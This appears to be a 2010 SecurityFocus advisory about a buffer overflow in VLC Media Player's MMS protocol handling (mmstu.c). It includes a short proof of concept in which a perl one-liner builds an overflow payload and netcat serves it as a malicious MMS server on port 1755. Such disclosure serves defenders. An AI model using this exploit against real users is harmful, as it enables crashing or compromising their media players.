VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to open a malicious MMS stream with the vulnerable application.

The following proof of concept to create a malicious server is available:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot


Privacy Statement
Copyright 2010, SecurityFocus